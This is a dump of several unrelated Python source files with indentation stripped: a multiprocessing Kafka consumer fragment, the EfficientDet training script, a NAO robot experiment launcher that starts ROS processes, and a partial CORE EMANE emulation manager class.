args = (self.queue, self.report_interval, self.json_logging, self.log_level, self.verbose, self.events)
proc = Process(target=_mp_consume_confluent_kafka if use_confluent_kafka else _mp_consume_kafka_python, args=args, kwargs=consumer_options)
proc.daemon = True
proc.start()
self.procs.append(proc)
def stop(self):
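# Signal shutdown first, then release any consumers blocked on the stop/start
# events so they can observe the exit flag and terminate cleanly.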
self.events.exit.set()
self.events.stop.set()
self.events.start.set()
for proc in self.procs:
proc.join()
proc.terminate()
def __iter__(self):
# first check if any of the child processes died
for proc in self.procs:
if not proc.is_alive():
raise Exception("Child process with PID %d died with %d exitcode" % (proc.pid, proc.exitcode))
while True:
self.events.stop.clear()
self.events.start.set()
try:
# Block for up to twice the report interval so that the consumers get
# a chance to run and put some messages in the queue.
message = self.queue.get(block=True, timeout=self.report_interval*2)
except queue.Empty:
break
yield message
self.events.stop.set()
self.events.start.clear()
|
main.py
|
# Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The main training script."""
import multiprocessing
import os
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
import dataloader
import det_model_fn
import hparams_config
import utils
flags.DEFINE_string(
'tpu',
default=None,
help='The Cloud TPU to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
'url.')
flags.DEFINE_string(
'gcp_project',
default=None,
help='Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
'tpu_zone',
default=None,
help='GCE zone where the Cloud TPU is located. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string('eval_name', default=None, help='Eval job name')
flags.DEFINE_enum('strategy', None, ['tpu', 'gpus', ''],
'Training: gpus for multi-gpu, if None, use TF default.')
flags.DEFINE_bool('use_fake_data', False, 'Use fake input.')
flags.DEFINE_bool(
'use_xla', False,
'Use XLA even if strategy is not tpu. If strategy is tpu, always use XLA, '
'and this flag has no effect.')
flags.DEFINE_string('model_dir', None, 'Location of model_dir')
flags.DEFINE_string(
'backbone_ckpt', '', 'Location of the ResNet50 checkpoint to use for model '
'initialization.')
flags.DEFINE_string('ckpt', None,
'Start training from this EfficientDet checkpoint.')
flags.DEFINE_string(
'hparams', '', 'Comma separated k=v pairs of hyperparameters or a module'
' containing attributes to use as hyperparameters.')
flags.DEFINE_integer(
'num_cores', default=8, help='Number of TPU cores for training')
flags.DEFINE_bool('use_spatial_partition', False, 'Use spatial partition.')
flags.DEFINE_integer(
'num_cores_per_replica',
default=2,
help='Number of TPU cores per replica when using spatial partition.')
flags.DEFINE_multi_integer(
'input_partition_dims', [1, 2, 1, 1],
'A list that describes the partition dims for all the tensors.')
flags.DEFINE_integer('train_batch_size', 64, 'global training batch size')
flags.DEFINE_integer('eval_batch_size', 1, 'global evaluation batch size')
flags.DEFINE_integer('eval_samples', 5000, 'Number of samples for eval.')
flags.DEFINE_integer('iterations_per_loop', 100,
'Number of iterations per TPU training loop')
flags.DEFINE_integer('save_checkpoints_steps', 100,
'Number of iterations per checkpoint save')
flags.DEFINE_string(
'training_file_pattern', None,
'Glob for training data files (e.g., COCO train - minival set)')
flags.DEFINE_string('validation_file_pattern', None,
'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
flags.DEFINE_string(
'val_json_file', None,
'COCO validation JSON containing golden bounding boxes. If None, use the '
'ground truth from the dataloader. Ignored if testdev_dir is not None.')
flags.DEFINE_string('testdev_dir', None,
'COCO testdev dir. If not None, ignore val_json_file.')
flags.DEFINE_integer('num_examples_per_epoch', 120000,
'Number of examples in one epoch')
flags.DEFINE_integer('num_epochs', None, 'Number of epochs for training')
flags.DEFINE_string('mode', 'train',
'Mode to run: train, eval, or train_and_eval (default: train)')
flags.DEFINE_string('model_name', 'efficientdet-d1', 'Model name.')
flags.DEFINE_bool('eval_after_training', False, 'Run one eval after the '
'training finishes.')
flags.DEFINE_bool('profile', False, 'Profile training performance.')
flags.DEFINE_integer(
'tf_random_seed', None, 'Sets the TF graph seed for deterministic execution'
' across runs (for debugging).')
# For Eval mode
flags.DEFINE_integer('min_eval_interval', 180,
'Minimum seconds between evaluations.')
flags.DEFINE_integer(
'eval_timeout', None,
'Maximum seconds between checkpoints before evaluation terminates.')
# for train_and_eval mode
flags.DEFINE_bool(
'run_epoch_in_child_process', True,
'This option helps to rectify a CPU memory leak. If True, every epoch is '
'run in a separate process for train and eval and memory will be cleared. '
'Drawback: need to kill 2 processes if training needs to be interrupted.')
FLAGS = flags.FLAGS
def main(_):
if FLAGS.strategy == 'tpu':
tf.disable_eager_execution()
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
tpu_grpc_url = tpu_cluster_resolver.get_master()
tf.Session.reset(tpu_grpc_url)
else:
tpu_cluster_resolver = None
# Check data path
if FLAGS.mode in ('train', 'train_and_eval'):
if FLAGS.training_file_pattern is None:
raise RuntimeError('Must specify --training_file_pattern for train.')
if FLAGS.mode in ('eval', 'train_and_eval'):
if FLAGS.validation_file_pattern is None:
raise RuntimeError('Must specify --validation_file_pattern for eval.')
# Parse and override hparams
config = hparams_config.get_detection_config(FLAGS.model_name)
config.override(FLAGS.hparams)
if FLAGS.num_epochs: # NOTE: remove this flag after updating all docs.
config.num_epochs = FLAGS.num_epochs
# Parse image size in case it is in string format.
config.image_size = utils.parse_image_size(config.image_size)
# The following is for spatial partitioning. `features` has one tensor while
# `labels` has 4 + (`max_level` - `min_level` + 1) * 2 tensors. The input
# partition is performed on `features` and all partitionable tensors of
# `labels`, see the partition logic below.
# In the TPUEstimator context, `shard` and `replica` mean the same thing;
# following the API, both terms are used interchangeably here.
if FLAGS.use_spatial_partition:
# Checks input_partition_dims agrees with num_cores_per_replica.
if FLAGS.num_cores_per_replica != np.prod(FLAGS.input_partition_dims):
raise RuntimeError('--num_cores_per_replica must be a product of array '
'elements in --input_partition_dims.')
labels_partition_dims = {
'mean_num_positives': None,
'source_ids': None,
'groundtruth_data': None,
'image_scales': None,
'image_masks': None,
}
# The Input Partition Logic: We partition only the partition-able tensors.
feat_sizes = utils.get_feat_sizes(
config.get('image_size'), config.get('max_level'))
for level in range(config.get('min_level'), config.get('max_level') + 1):
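# A level's targets are spatially partitioned only if both its height and
# width are divisible by every entry in --input_partition_dims; otherwise
# that level falls back to no partitioning.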
def _can_partition(spatial_dim):
partitionable_index = np.where(
spatial_dim % np.array(FLAGS.input_partition_dims) == 0)
return len(partitionable_index[0]) == len(FLAGS.input_partition_dims)
spatial_dim = feat_sizes[level]
if _can_partition(spatial_dim['height']) and _can_partition(
spatial_dim['width']):
labels_partition_dims['box_targets_%d' %
level] = FLAGS.input_partition_dims
labels_partition_dims['cls_targets_%d' %
level] = FLAGS.input_partition_dims
else:
labels_partition_dims['box_targets_%d' % level] = None
labels_partition_dims['cls_targets_%d' % level] = None
num_cores_per_replica = FLAGS.num_cores_per_replica
input_partition_dims = [FLAGS.input_partition_dims, labels_partition_dims]
num_shards = FLAGS.num_cores // num_cores_per_replica
else:
num_cores_per_replica = None
input_partition_dims = None
num_shards = FLAGS.num_cores
params = dict(
config.as_dict(),
model_name=FLAGS.model_name,
iterations_per_loop=FLAGS.iterations_per_loop,
model_dir=FLAGS.model_dir,
num_shards=num_shards,
num_examples_per_epoch=FLAGS.num_examples_per_epoch,
strategy=FLAGS.strategy,
backbone_ckpt=FLAGS.backbone_ckpt,
ckpt=FLAGS.ckpt,
val_json_file=FLAGS.val_json_file,
testdev_dir=FLAGS.testdev_dir,
profile=FLAGS.profile,
mode=FLAGS.mode)
config_proto = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False)
if FLAGS.strategy != 'tpu':
if FLAGS.use_xla:
config_proto.graph_options.optimizer_options.global_jit_level = (
tf.OptimizerOptions.ON_1)
config_proto.gpu_options.allow_growth = True
model_dir = FLAGS.model_dir
model_fn_instance = det_model_fn.get_model_fn(FLAGS.model_name)
max_instances_per_image = config.max_instances_per_image
if FLAGS.eval_samples:
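# Ceiling division: round up so every eval sample is covered even when
# eval_samples is not an exact multiple of the eval batch size.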
eval_steps = int((FLAGS.eval_samples + FLAGS.eval_batch_size - 1) //
FLAGS.eval_batch_size)
else:
eval_steps = None
total_examples = int(config.num_epochs * FLAGS.num_examples_per_epoch)
train_steps = total_examples // FLAGS.train_batch_size
logging.info(params)
if not tf.io.gfile.exists(model_dir):
tf.io.gfile.makedirs(model_dir)
config_file = os.path.join(model_dir, 'config.yaml')
if not tf.io.gfile.exists(config_file):
tf.io.gfile.GFile(config_file, 'w').write(str(config))
train_input_fn = dataloader.InputReader(
FLAGS.training_file_pattern,
is_training=True,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
eval_input_fn = dataloader.InputReader(
FLAGS.validation_file_pattern,
is_training=False,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
if FLAGS.strategy == 'tpu':
tpu_config = tf.estimator.tpu.TPUConfig(
FLAGS.iterations_per_loop if FLAGS.strategy == 'tpu' else 1,
num_cores_per_replica=num_cores_per_replica,
input_partition_dims=input_partition_dims,
per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
.PER_HOST_V2)
run_config = tf.estimator.tpu.RunConfig(
cluster=tpu_cluster_resolver,
model_dir=model_dir,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
tpu_config=tpu_config,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
# TPUEstimator can do both train and eval.
train_est = tf.estimator.tpu.TPUEstimator(
model_fn=model_fn_instance,
train_batch_size=FLAGS.train_batch_size,
eval_batch_size=FLAGS.eval_batch_size,
config=run_config,
params=params)
eval_est = train_est
else:
strategy = None
if FLAGS.strategy == 'gpus':
strategy = tf.distribute.MirroredStrategy()
run_config = tf.estimator.RunConfig(
model_dir=model_dir,
train_distribute=strategy,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
def get_estimator(global_batch_size):
params['num_shards'] = getattr(strategy, 'num_replicas_in_sync', 1)
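# Per-replica batch size: the global batch is divided evenly across replicas.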
params['batch_size'] = global_batch_size // params['num_shards']
return tf.estimator.Estimator(
model_fn=model_fn_instance, config=run_config, params=params)
# train and eval need different estimators due to different batch sizes.
train_est = get_estimator(FLAGS.train_batch_size)
eval_est = get_estimator(FLAGS.eval_batch_size)
# start train/eval flow.
if FLAGS.mode == 'train':
train_est.train(input_fn=train_input_fn, max_steps=train_steps)
if FLAGS.eval_after_training:
eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
elif FLAGS.mode == 'eval':
# Run evaluation when there's a new checkpoint
for ckpt in tf.train.checkpoints_iterator(
FLAGS.model_dir,
min_interval_secs=FLAGS.min_eval_interval,
timeout=FLAGS.eval_timeout):
logging.info('Starting to evaluate.')
try:
eval_results = eval_est.evaluate(eval_input_fn, steps=eval_steps)
# Terminate eval job when final checkpoint is reached.
try:
current_step = int(os.path.basename(ckpt).split('-')[1])
except IndexError:
logging.info('%s has no global step info: stop!', ckpt)
break
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
if current_step >= train_steps:
logging.info('Eval finished step %d/%d', current_step, train_steps)
break
except tf.errors.NotFoundError:
# The checkpoint might have been deleted by the time eval finished.
# We simply skip such cases.
logging.info('Checkpoint %s no longer exists, skipping.', ckpt)
elif FLAGS.mode == 'train_and_eval':
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
try:
step = int(os.path.basename(ckpt).split('-')[1])
current_epoch = (
step * FLAGS.train_batch_size // FLAGS.num_examples_per_epoch)
logging.info('found ckpt at step %d (epoch %d)', step, current_epoch)
except (IndexError, TypeError):
logging.info('Folder %s has no ckpt with valid step.', FLAGS.model_dir)
current_epoch = 0
def run_train_and_eval(e):
print('\n =====> Starting training, epoch: %d.' % e)
train_est.train(
input_fn=train_input_fn,
max_steps=e * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
print('\n =====> Starting evaluation, epoch: %d.' % e)
eval_results = eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
epochs_per_cycle = 1 # a higher number reduces graph construction overhead.
for e in range(current_epoch + 1, config.num_epochs + 1, epochs_per_cycle):
if FLAGS.run_epoch_in_child_process:
p = multiprocessing.Process(target=run_train_and_eval, args=(e,))
p.start()
p.join()
if p.exitcode != 0:
return p.exitcode
else:
run_train_and_eval(e)
else:
logging.info('Invalid mode: %s', FLAGS.mode)
if __name__ == '__main__':
app.run(main)
|
main_nao.py
|
import os
import threading
from naoqi import ALProxy
import time
def intro(subject_id):
start_working(subject_id)
time.sleep(60)
def start_working(subject_id):
subject_id = subject_id
def worker1():
os.system('roslaunch skeleton_markers markers.launch')
return
def worker2():
os.system('python curious_game/angle_matrix.py')
return
def worker3():
os.system('python curious_game/nao_ros.py')
return
def worker4():
os.system('rosbag record -a -o data/physical_curiosity_open_day_' + subject_id + '.bag')
def worker5():
os.system('python curious_game/skeleton_angles.py')
def worker6():
os.system('python curious_game/experiment.py '+subject_id)
def worker7():
os.system('python curious_game/nao_camera_ros.py')
def worker8():
os.system('roslaunch multi_camera_affdex multi_camera_affdex.launch')
t1 = threading.Thread(target=worker1)
t1.start()
time.sleep(0.2)
t2 = threading.Thread(target=worker2)
t2.start()
time.sleep(0.2)
t3 = threading.Thread(target=worker3)
t3.start()
time.sleep(0.2)
t5 = threading.Thread(target=worker5)
t5.start()
time.sleep(0.2)
t6 = threading.Thread(target=worker6)
t6.start()
time.sleep(0.2)
t7 = threading.Thread(target=worker7)
t7.start()
time.sleep(0.2)
t8 = threading.Thread(target=worker8)
t8.start()
time.sleep(0.2)
t4 = threading.Thread(target=worker4)
t4.start()
intro("52")
|
emanemanager.py
|
"""
emanemanager.py: definition of an EmaneManager class for implementing configuration control of an EMANE emulation.
"""
import logging
import os
import threading
from core import CoreCommandError, utils
from core import constants
from core.api.tlv import coreapi, dataconversion
from core.config import ConfigGroup
from core.config import ConfigShim
from core.config import Configuration
from core.config import ModelManager
from core.emane import emanemanifest
from core.emane.bypass import EmaneBypassModel
from core.emane.commeffect import EmaneCommEffectModel
from core.emane.emanemodel import EmaneModel
from core.emane.ieee80211abg import EmaneIeee80211abgModel
from core.emane.rfpipe import EmaneRfPipeModel
from core.emane.tdma import EmaneTdmaModel
from core.emulator.enumerations import ConfigDataTypes
from core.emulator.enumerations import ConfigFlags
from core.emulator.enumerations import ConfigTlvs
from core.emulator.enumerations import MessageFlags
from core.emulator.enumerations import MessageTypes
from core.emulator.enumerations import NodeTypes
from core.emulator.enumerations import RegisterTlvs
from core.nodes import nodeutils
from core.xml import emanexml
try:
from emane.events import EventService
from emane.events import LocationEvent
from emane.events.eventserviceexception import EventServiceException
except ImportError:
try:
from emanesh.events import EventService
from emanesh.events import LocationEvent
from emanesh.events.eventserviceexception import EventServiceException
except ImportError:
logging.debug("compatible emane python bindings not installed")
EMANE_MODELS = [
EmaneRfPipeModel,
EmaneIeee80211abgModel,
EmaneCommEffectModel,
EmaneBypassModel,
EmaneTdmaModel
]
DEFAULT_EMANE_PREFIX = "/usr"
class EmaneManager(ModelManager):
"""
EMANE controller object. Lives in a Session instance and is used for
building EMANE config files from all of the EmaneNode objects in this
emulation, and for controlling the EMANE daemons.
"""
name = "emane"
config_type = RegisterTlvs.EMULATION_SERVER.value
SUCCESS, NOT_NEEDED, NOT_READY = (0, 1, 2)
EVENTCFGVAR = "LIBEMANEEVENTSERVICECONFIG"
DEFAULT_LOG_LEVEL = 3
def __init__(self, session):
"""
Creates an EmaneManager instance.
:param core.session.Session session: session this manager is tied to
:return: nothing
"""
super(EmaneManager, self).__init__()
self.session = session
self._emane_nodes = {}
self._emane_node_lock = threading.Lock()
self._ifccounts = {}
self._ifccountslock = threading.Lock()
# port numbers are allocated from these counters
self.platformport = self.session.options.get_config_int("emane_platform_port", 8100)
self.transformport = self.session.options.get_config_int("emane_transform_port", 8200)
self.doeventloop = False
self.eventmonthread = None
# model for global EMANE configuration options
self.emane_config = EmaneGlobalModel(session)
self.set_configs(self.emane_config.default_values())
session.broker.handlers.add(self.handledistributed)
self.service = None
self.event_device = None
self.emane_check()
def getifcconfig(self, node_id, interface, model_name):
"""
Retrieve interface configuration or node configuration if not provided.
:param int node_id: node id
:param interface: node interface
:param str model_name: model to get configuration for
:return: node/interface model configuration
:rtype: dict
"""
# use the network-wide config values or interface(NEM)-specific values?
if interface is None:
return self.get_configs(node_id=node_id, config_type=model_name)
else:
# don"t use default values when interface config is the same as net
# note here that using ifc.node.id as key allows for only one type
# of each model per node;
# TODO: use both node and interface as key
# Adamson change: first check for iface config keyed by "node:ifc.name"
# (so that nodes w/ multiple interfaces of same conftype can have
# different configs for each separate interface)
key = 1000 * interface.node.id
if interface.netindex is not None:
key += interface.netindex
# try retrieve interface specific configuration, avoid getting defaults
config = self.get_configs(node_id=key, config_type=model_name)
# otherwise retrieve the interfaces node configuration, avoid using defaults
if not config:
config = self.get_configs(node_id=interface.node.id, config_type=model_name)
# get non interface config, when none found
if not config:
# with EMANE 0.9.2+, we need an extra NEM XML from
# model.buildnemxmlfiles(), so defaults are returned here
config = self.get_configs(node_id=node_id, config_type=model_name)
return config
def config_reset(self, node_id=None):
super(EmaneManager, self).config_reset(node_id)
self.set_configs(self.emane_config.default_values())
def emane_check(self):
"""
Check if emane is installed and load models.
:return: nothing
"""
try:
# check for emane
emane_version = utils.check_cmd(["emane", "--version"])
logging.info("using EMANE: %s", emane_version)
# load default emane models
self.load_models(EMANE_MODELS)
# load custom models
custom_models_path = self.session.options.get_config("emane_models_dir")
if custom_models_path:
emane_models = utils.load_classes(custom_models_path, EmaneModel)
self.load_models(emane_models)
except CoreCommandError:
logging.info("emane is not installed")
def deleteeventservice(self):
if self.service:
for fd in self.service._readFd, self.service._writeFd:
if fd >= 0:
os.close(fd)
for f in self.service._socket, self.service._socketOTA:
if f:
f.close()
self.service = None
self.event_device = None
def initeventservice(self, filename=None, shutdown=False):
"""
Re-initialize the EMANE Event service.
The multicast group and/or port may be configured.
"""
self.deleteeventservice()
if shutdown:
return
# Get the control network to be used for events
group, port = self.get_config("eventservicegroup").split(":")
self.event_device = self.get_config("eventservicedevice")
eventnetidx = self.session.get_control_net_index(self.event_device)
if eventnetidx < 0:
logging.error("invalid emane event service device provided: %s", self.event_device)
return False
# make sure the event control network is in place
eventnet = self.session.add_remove_control_net(net_index=eventnetidx, remove=False, conf_required=False)
if eventnet is not None:
# direct EMANE events towards control net bridge
self.event_device = eventnet.brname
eventchannel = (group, int(port), self.event_device)
# otachannel is disabled for the event service; it is
# only needed for e.g. antennaprofile events transmitted by models
logging.info("using %s for event service traffic", self.event_device)
try:
self.service = EventService(eventchannel=eventchannel, otachannel=None)
except EventServiceException:
logging.exception("error instantiating emane EventService")
return True
def load_models(self, emane_models):
"""
Load EMANE models and make them available.
"""
for emane_model in emane_models:
logging.info("loading emane model: %s", emane_model.__name__)
emane_prefix = self.session.options.get_config("emane_prefix", default=DEFAULT_EMANE_PREFIX)
emane_model.load(emane_prefix)
self.models[emane_model.name] = emane_model
def add_node(self, emane_node):
"""
Add a new EmaneNode object to this Emane controller object
:param core.emane.nodes.EmaneNode emane_node: emane node to add
:return: nothing
"""
with self._emane_node_lock:
if emane_node.id in self._emane_nodes:
raise KeyError("non-unique EMANE object id %s for %s" % (emane_node.id, emane_node))
self._emane_nodes[emane_node.id] = emane_node
def getnodes(self):
"""
Return a set of CoreNodes that are linked to an EmaneNode,
e.g. containers having one or more radio interfaces.
"""
# assumes self._emane_node_lock is already held
nodes = set()
for emane_node in self._emane_nodes.values():
for netif in emane_node.netifs():
nodes.add(netif.node)
return nodes
def setup(self):
"""
Populate self._objs with EmaneNodes; perform distributed setup;
associate models with EmaneNodes from self.config. Returns
Emane.(SUCCESS, NOT_NEEDED, NOT_READY) in order to delay session
instantiation.
"""
logging.debug("emane setup")
# TODO: drive this from the session object
with self.session._nodes_lock:
for node_id in self.session.nodes:
node = self.session.nodes[node_id]
if nodeutils.is_node(node, NodeTypes.EMANE):
logging.debug("adding emane node: id(%s) name(%s)", node.id, node.name)
self.add_node(node)
if not self._emane_nodes:
logging.debug("no emane nodes in session")
return EmaneManager.NOT_NEEDED
# control network bridge required for EMANE 0.9.2
# - needs to be configured before checkdistributed() for distributed
# - needs to exist when eventservice binds to it (initeventservice)
if self.session.master:
otadev = self.get_config("otamanagerdevice")
netidx = self.session.get_control_net_index(otadev)
logging.debug("emane ota manager device: index(%s) otadev(%s)", netidx, otadev)
if netidx < 0:
logging.error("EMANE cannot start, check core config. invalid OTA device provided: %s", otadev)
return EmaneManager.NOT_READY
ctrlnet = self.session.add_remove_control_net(net_index=netidx, remove=False, conf_required=False)
self.distributedctrlnet(ctrlnet)
eventdev = self.get_config("eventservicedevice")
logging.debug("emane event service device: eventdev(%s)", eventdev)
if eventdev != otadev:
netidx = self.session.get_control_net_index(eventdev)
logging.debug("emane event service device index: %s", netidx)
if netidx < 0:
logging.error("EMANE cannot start, check core config. invalid event service device: %s", eventdev)
return EmaneManager.NOT_READY
ctrlnet = self.session.add_remove_control_net(net_index=netidx, remove=False, conf_required=False)
self.distributedctrlnet(ctrlnet)
if self.checkdistributed():
# we are slave, but haven't received a platformid yet
platform_id_start = "platform_id_start"
default_values = self.emane_config.default_values()
value = self.get_config(platform_id_start)
if value == default_values[platform_id_start]:
return EmaneManager.NOT_READY
self.check_node_models()
return EmaneManager.SUCCESS
def startup(self):
"""
After all the EmaneNode objects have been added, build XML files
and start the daemons. Returns Emane.(SUCCESS, NOT_NEEDED, or
NOT_READY) which is used to delay session instantiation.
"""
self.reset()
r = self.setup()
# NOT_NEEDED or NOT_READY
if r != EmaneManager.SUCCESS:
return r
nems = []
with self._emane_node_lock:
self.buildxml()
self.initeventservice()
self.starteventmonitor()
if self.numnems() > 0:
self.startdaemons()
self.installnetifs()
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
for netif in emane_node.netifs():
nems.append((netif.node.name, netif.name, emane_node.getnemid(netif)))
if nems:
emane_nems_filename = os.path.join(self.session.session_dir, "emane_nems")
try:
with open(emane_nems_filename, "w") as f:
for nodename, ifname, nemid in nems:
f.write("%s %s %s\n" % (nodename, ifname, nemid))
except IOError:
logging.exception("Error writing EMANE NEMs file: %s")
return EmaneManager.SUCCESS
def poststartup(self):
"""
Retransmit location events now that all NEMs are active.
"""
if not self.genlocationevents():
return
with self._emane_node_lock:
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
logging.debug("post startup for emane node: %s - %s", emane_node.id, emane_node.name)
emane_node.model.post_startup()
for netif in emane_node.netifs():
x, y, z = netif.node.position.get()
emane_node.setnemposition(netif, x, y, z)
def reset(self):
"""
remove all EmaneNode objects from the dictionary,
reset port numbers and nem id counters
"""
with self._emane_node_lock:
self._emane_nodes.clear()
# don't clear self._ifccounts here; NEM counts are needed for buildxml
self.platformport = self.session.options.get_config_int("emane_platform_port", 8100)
self.transformport = self.session.options.get_config_int("emane_transform_port", 8200)
def shutdown(self):
"""
stop all EMANE daemons
"""
with self._ifccountslock:
self._ifccounts.clear()
with self._emane_node_lock:
if not self._emane_nodes:
return
logging.info("stopping EMANE daemons.")
self.deinstallnetifs()
self.stopdaemons()
self.stopeventmonitor()
def handledistributed(self, message):
"""
Broker handler for processing CORE API messages as they are
received. This is used to snoop the Link add messages to get NEM
counts of NEMs that exist on other servers.
"""
if message.message_type == MessageTypes.LINK.value and message.flags & MessageFlags.ADD.value:
nn = message.node_numbers()
# first node is always link layer node in Link add message
if nn[0] in self.session.broker.network_nodes:
serverlist = self.session.broker.getserversbynode(nn[1])
for server in serverlist:
with self._ifccountslock:
if server not in self._ifccounts:
self._ifccounts[server] = 1
else:
self._ifccounts[server] += 1
def checkdistributed(self):
"""
Check for EMANE nodes that exist on multiple emulation servers and
coordinate the NEM id and port number space.
If we are the master EMANE node, return False so initialization will
proceed as normal; otherwise slaves return True here and
initialization is deferred.
"""
# check with the session whether we are the "master" Emane object
master = False
with self._emane_node_lock:
if self._emane_nodes:
master = self.session.master
logging.info("emane check distributed as master: %s.", master)
# we are not the master Emane object, wait for nem id and ports
if not master:
return True
nemcount = 0
with self._emane_node_lock:
for key in self._emane_nodes:
emane_node = self._emane_nodes[key]
nemcount += emane_node.numnetif()
nemid = int(self.get_config("nem_id_start"))
nemid += nemcount
platformid = int(self.get_config("platform_id_start"))
# build an ordered list of servers so platform ID is deterministic
servers = []
for key in sorted(self._emane_nodes):
for server in self.session.broker.getserversbynode(key):
if server not in servers:
servers.append(server)
servers.sort(key=lambda x: x.name)
for server in servers:
if server.name == "localhost":
continue
if server.sock is None:
continue
platformid += 1
typeflags = ConfigFlags.UPDATE.value
self.set_config("platform_id_start", str(platformid))
self.set_config("nem_id_start", str(nemid))
config_data = ConfigShim.config_data(0, None, typeflags, self.emane_config, self.get_configs())
message = dataconversion.convert_config(config_data)
server.sock.send(message)
# increment nemid for next server by number of interfaces
with self._ifccountslock:
if server in self._ifccounts:
nemid += self._ifccounts[server]
return False
def buildxml(self):
"""
Build XML files required to run EMANE on each node.
NEMs run inside containers using the control network for passing
events and data.
"""
# assume self._emane_node_lock is already held here
logging.info("emane building xml...")
# on master, control network bridge added earlier in startup()
ctrlnet = self.session.add_remove_control_net(net_index=0, remove=False, conf_required=False)
self.buildplatformxml(ctrlnet)
self.buildnemxml()
self.buildeventservicexml()
# TODO: remove need for tlv messaging
def distributedctrlnet(self, ctrlnet):
"""
Distributed EMANE requires multiple control network prefixes to
be configured. This generates configuration for slave control nets
using the default list of prefixes.
"""
session = self.session
# slave server
if not session.master:
return
servers = session.broker.getservernames()
# not distributed
if len(servers) < 2:
return
prefix = session.options.get_config("controlnet")
prefixes = prefix.split()
# normal Config messaging will distribute controlnets
if len(prefixes) >= len(servers):
return
# this generates a config message having controlnet prefix assignments
logging.info("Setting up default controlnet prefixes for distributed (%d configured)" % len(prefixes))
prefixes = ctrlnet.DEFAULT_PREFIX_LIST[0]
vals = 'controlnet="%s"' % prefixes
tlvdata = b""
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.OBJECT.value, "session")
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.TYPE.value, 0)
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.VALUES.value, vals)
rawmsg = coreapi.CoreConfMessage.pack(0, tlvdata)
msghdr = rawmsg[:coreapi.CoreMessage.header_len]
msg = coreapi.CoreConfMessage(flags=0, hdr=msghdr, data=rawmsg[coreapi.CoreMessage.header_len:])
self.session.broker.handle_message(msg)
def check_node_models(self):
"""
Associate EmaneModel classes with EmaneNode nodes. The model
configurations are stored in self.configs.
"""
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
logging.debug("checking emane model for node: %s", node_id)
# skip nodes that already have a model set
if emane_node.model:
logging.debug("node(%s) already has model(%s)", emane_node.id, emane_node.model.name)
continue
# set model configured for node, due to legacy messaging configuration before nodes exist
model_name = self.node_models.get(node_id)
if not model_name:
logging.error("emane node(%s) has no node model", node_id)
raise ValueError("emane node has no model set")
config = self.get_model_config(node_id=node_id, model_name=model_name)
logging.debug("setting emane model(%s) config(%s)", model_name, config)
model_class = self.models[model_name]
emane_node.setmodel(model_class, config)
def nemlookup(self, nemid):
"""
Look for the given numerical NEM ID and return the first matching
EmaneNode and NEM interface.
"""
emane_node = None
netif = None
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
netif = emane_node.getnemnetif(nemid)
if netif is not None:
break
else:
emane_node = None
return emane_node, netif
def numnems(self):
"""
Return the number of NEMs emulated locally.
"""
count = 0
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
count += len(emane_node.netifs())
return count
def buildplatformxml(self, ctrlnet):
"""
Build a platform.xml file now that all nodes are configured.
"""
nemid = int(self.get_config("nem_id_start"))
platform_xmls = {}
# assume self._emane_node_lock is already held here
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
nemid = emanexml.build_node_platform_xml(self, ctrlnet, emane_node, nemid, platform_xmls)
def buildnemxml(self):
"""
Builds the xxxnem.xml, xxxmac.xml, and xxxphy.xml files which
are defined on a per-EmaneNode basis.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
emanexml.build_xml_files(self, emane_node)
def buildtransportxml(self):
"""
Calls emanegentransportxml using a platform.xml file to build the transportdaemon*.xml.
"""
utils.check_cmd(["emanegentransportxml", "platform.xml"], cwd=self.session.session_dir)
def buildeventservicexml(self):
"""
Build the libemaneeventservice.xml file if event service options
were changed in the global config.
"""
need_xml = False
default_values = self.emane_config.default_values()
for name in ["eventservicegroup", "eventservicedevice"]:
a = default_values[name]
b = self.get_config(name)
if a != b:
need_xml = True
if not need_xml:
# reset to using default config
self.initeventservice()
return
try:
group, port = self.get_config("eventservicegroup").split(":")
except ValueError:
logging.exception("invalid eventservicegroup in EMANE config")
return
dev = self.get_config("eventservicedevice")
